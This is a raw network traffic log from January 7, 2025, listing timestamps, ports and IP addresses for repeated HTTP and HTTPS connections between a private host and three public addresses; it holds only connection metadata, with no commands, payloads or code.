Jan 7, 2025 13:25:30.299998045 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.300072908 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.367263079 CET	443	49879	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.368942022 CET	49879	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.368997097 CET	443	49879	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.506597042 CET	443	49879	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.506664991 CET	443	49879	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.506722927 CET	49879	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.507297039 CET	49879	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.510802984 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.512013912 CET	49886	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.515877962 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.516030073 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.516828060 CET	80	49886	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.516906977 CET	49886	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.517153978 CET	49886	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.522002935 CET	80	49886	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.556154966 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.556211948 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.556627035 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.558315039 CET	443	49880	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.560187101 CET	49880	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.560230017 CET	443	49880	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.573677063 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.573712111 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.690562963 CET	443	49880	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.690627098 CET	443	49880	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.690692902 CET	49880	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.691246986 CET	49880	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.696104050 CET	49873	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.697681904 CET	49889	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.701162100 CET	80	49873	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.702568054 CET	80	49889	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.702636957 CET	49873	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.702663898 CET	49889	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.702820063 CET	49889	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.707596064 CET	80	49889	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.029278040 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.029424906 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.030842066 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.030852079 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.031131029 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.082295895 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.127324104 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.193206072 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.193285942 CET	443	49887	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.193366051 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.196456909 CET	49887	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.202631950 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.207401037 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.304066896 CET	80	49886	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.306756020 CET	49895	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.306813955 CET	443	49895	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.306895971 CET	49895	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.307141066 CET	49895	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.307153940 CET	443	49895	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.350398064 CET	49886	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.475732088 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.480840921 CET	49896	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.480891943 CET	443	49896	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.481149912 CET	49896	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.485512018 CET	49896	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.485531092 CET	443	49896	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.497011900 CET	80	49889	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.498228073 CET	49897	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.498265028 CET	443	49897	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.498440027 CET	49897	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.498696089 CET	49897	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.498709917 CET	443	49897	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.522386074 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.537893057 CET	49889	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.786108971 CET	443	49895	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.787775993 CET	49895	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.787790060 CET	443	49895	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.939124107 CET	443	49895	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.939192057 CET	443	49895	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.939393997 CET	49895	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.939766884 CET	49895	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.944597960 CET	49901	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.949376106 CET	80	49901	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.951898098 CET	49901	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.952028036 CET	49901	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:31.956810951 CET	80	49901	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:31.959671021 CET	443	49896	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.962836027 CET	49896	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.962851048 CET	443	49896	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.981395960 CET	443	49897	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:31.982827902 CET	49897	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:31.982836008 CET	443	49897	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:32.098057985 CET	443	49896	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:32.098129988 CET	443	49896	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:32.098385096 CET	49896	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:32.099024057 CET	49896	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:32.102264881 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.103503942 CET	49904	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.107235909 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:32.108254910 CET	80	49904	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:32.108318090 CET	49904	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.108401060 CET	49904	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.108505964 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.113152027 CET	80	49904	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:32.114270926 CET	443	49897	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:32.114342928 CET	443	49897	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:32.114522934 CET	49897	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:32.114861965 CET	49897	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:32.117597103 CET	49889	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.118113995 CET	49905	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.122518063 CET	80	49889	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:32.122577906 CET	49889	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.122941017 CET	80	49905	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:32.122998953 CET	49905	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.123080969 CET	49905	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:32.127887011 CET	80	49905	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:33.304622889 CET	80	49901	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:33.305839062 CET	49912	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.305893898 CET	443	49912	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.306045055 CET	49912	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.306279898 CET	49912	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.306291103 CET	443	49912	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.350403070 CET	49901	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.432992935 CET	80	49905	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:33.434113026 CET	49913	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.434166908 CET	443	49913	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.434237003 CET	49913	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.434740067 CET	49913	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.434758902 CET	443	49913	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.475419044 CET	49905	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.526985884 CET	80	49904	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:33.536566019 CET	49914	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.536623955 CET	443	49914	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.536904097 CET	49914	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.537209988 CET	49914	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.537220955 CET	443	49914	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.569168091 CET	49904	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.776806116 CET	443	49912	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.778515100 CET	49912	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.778548956 CET	443	49912	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.911004066 CET	443	49913	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.912831068 CET	49913	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.912854910 CET	443	49913	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.925354004 CET	443	49912	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.925427914 CET	443	49912	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:33.925533056 CET	49912	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.925942898 CET	49912	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:33.929456949 CET	49901	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.930584908 CET	49919	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.934431076 CET	80	49901	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:33.934504032 CET	49901	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.935386896 CET	80	49919	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:33.935458899 CET	49919	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.935595989 CET	49919	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:33.940331936 CET	80	49919	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:34.013107061 CET	443	49914	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.014801979 CET	49914	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.014827967 CET	443	49914	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.062011957 CET	443	49913	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.062083960 CET	443	49913	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.062453032 CET	49913	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.062582970 CET	49913	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.114844084 CET	49905	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:34.119950056 CET	80	49905	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:34.120017052 CET	49905	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:34.123097897 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.123132944 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.123198986 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.123630047 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.123640060 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.145554066 CET	443	49914	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.145617962 CET	443	49914	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.145698071 CET	49914	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.146193981 CET	49914	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.151177883 CET	49921	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:34.156003952 CET	80	49921	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:34.156111956 CET	49921	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:34.156344891 CET	49921	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:34.161088943 CET	80	49921	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:34.711153030 CET	80	49919	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:34.712431908 CET	49926	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.712466002 CET	443	49926	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.712583065 CET	49926	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.712867975 CET	49926	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.712877989 CET	443	49926	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.734236002 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.734302998 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.736282110 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.736303091 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.736593962 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.738050938 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.756663084 CET	49919	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:34.779328108 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.976330996 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.976407051 CET	443	49920	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:34.976553917 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:34.988179922 CET	80	49921	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:34.989330053 CET	49927	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.989367008 CET	443	49927	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.989480019 CET	49927	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.989762068 CET	49927	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:34.989772081 CET	443	49927	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:34.990106106 CET	49920	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:35.037898064 CET	49921	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.171026945 CET	443	49926	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.172642946 CET	49926	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:35.172662020 CET	443	49926	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.315551043 CET	443	49926	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.315615892 CET	443	49926	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.315706968 CET	49926	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:35.316186905 CET	49926	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:35.319895029 CET	49919	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.320884943 CET	49932	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.324856043 CET	80	49919	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:35.324934006 CET	49919	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.325735092 CET	80	49932	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:35.325865030 CET	49932	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.325990915 CET	49932	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.330810070 CET	80	49932	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:35.448735952 CET	443	49927	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.450283051 CET	49927	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:35.450314045 CET	443	49927	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.575104952 CET	443	49927	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.575171947 CET	443	49927	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:35.575257063 CET	49927	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:35.576113939 CET	49927	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:35.587542057 CET	49921	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.588677883 CET	49934	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.592470884 CET	80	49921	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:35.592595100 CET	49921	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.593508959 CET	80	49934	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:35.593611956 CET	49934	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.597207069 CET	49934	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:35.602039099 CET	80	49934	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:36.139569998 CET	80	49932	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:36.141205072 CET	49939	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.141257048 CET	443	49939	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.141644955 CET	49939	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.141976118 CET	49939	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.141988039 CET	443	49939	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.194438934 CET	49932	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.378267050 CET	80	49934	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:36.379575968 CET	49941	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.379623890 CET	443	49941	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.379708052 CET	49941	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.379971027 CET	49941	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.379982948 CET	443	49941	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.431277990 CET	49934	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.599663973 CET	443	49939	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.601198912 CET	49939	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.601227999 CET	443	49939	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.943286896 CET	443	49939	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.943367004 CET	443	49939	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.943483114 CET	49939	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.943867922 CET	49939	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.946484089 CET	443	49941	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.948455095 CET	49941	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:36.948476076 CET	443	49941	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:36.950077057 CET	49932	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.951426029 CET	49946	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.955459118 CET	80	49932	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:36.955673933 CET	49932	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.956350088 CET	80	49946	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:36.956446886 CET	49946	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.956527948 CET	49946	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:36.961277008 CET	80	49946	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:37.092104912 CET	443	49941	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:37.092160940 CET	443	49941	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:37.092333078 CET	49941	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.092653990 CET	49941	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.095999956 CET	49934	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:37.097059011 CET	49947	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:37.100923061 CET	80	49934	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:37.101041079 CET	49934	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:37.101924896 CET	80	49947	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:37.102027893 CET	49947	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:37.102123976 CET	49947	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:37.106858969 CET	80	49947	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:37.751904011 CET	80	49946	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:37.753232956 CET	49953	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.753268957 CET	443	49953	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:37.753637075 CET	49953	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.753637075 CET	49953	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.753667116 CET	443	49953	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:37.803534031 CET	49946	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:37.882294893 CET	80	49947	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:37.883538961 CET	49954	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.883554935 CET	443	49954	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:37.883666039 CET	49954	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.883893013 CET	49954	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:37.883903027 CET	443	49954	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:37.928535938 CET	49947	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.235660076 CET	443	49953	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.237232924 CET	49953	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:38.237262964 CET	443	49953	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.396203041 CET	443	49953	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.396281004 CET	443	49953	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.396399975 CET	49953	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:38.396899939 CET	49953	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:38.400418997 CET	49946	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.401590109 CET	49960	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.405363083 CET	80	49946	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:38.405450106 CET	49946	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.406424999 CET	80	49960	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:38.406502008 CET	49960	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.406665087 CET	49960	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.411423922 CET	80	49960	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:38.434708118 CET	443	49954	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.436301947 CET	49954	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:38.436332941 CET	443	49954	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.594614983 CET	443	49954	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.594682932 CET	443	49954	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:38.594743967 CET	49954	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:38.595217943 CET	49954	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:38.598967075 CET	49947	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.599952936 CET	49961	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.603970051 CET	80	49947	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:38.604149103 CET	49947	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.607292891 CET	80	49961	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:38.607361078 CET	49961	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.607492924 CET	49961	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:38.622389078 CET	80	49961	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:39.287688017 CET	80	49960	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:39.289303064 CET	49967	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.289355993 CET	443	49967	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.289431095 CET	49967	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.289726019 CET	49967	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.289741039 CET	443	49967	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.334793091 CET	49960	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.533214092 CET	80	49961	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:39.534302950 CET	49968	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.534341097 CET	443	49968	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.534638882 CET	49968	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.534638882 CET	49968	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.534672022 CET	443	49968	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.584800959 CET	49961	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.749711990 CET	443	49967	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.751657009 CET	49967	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.751704931 CET	443	49967	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.899070024 CET	443	49967	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.899158955 CET	443	49967	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:39.899283886 CET	49967	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:39.900002003 CET	49967	443	192.168.2.5	188.114.97.3
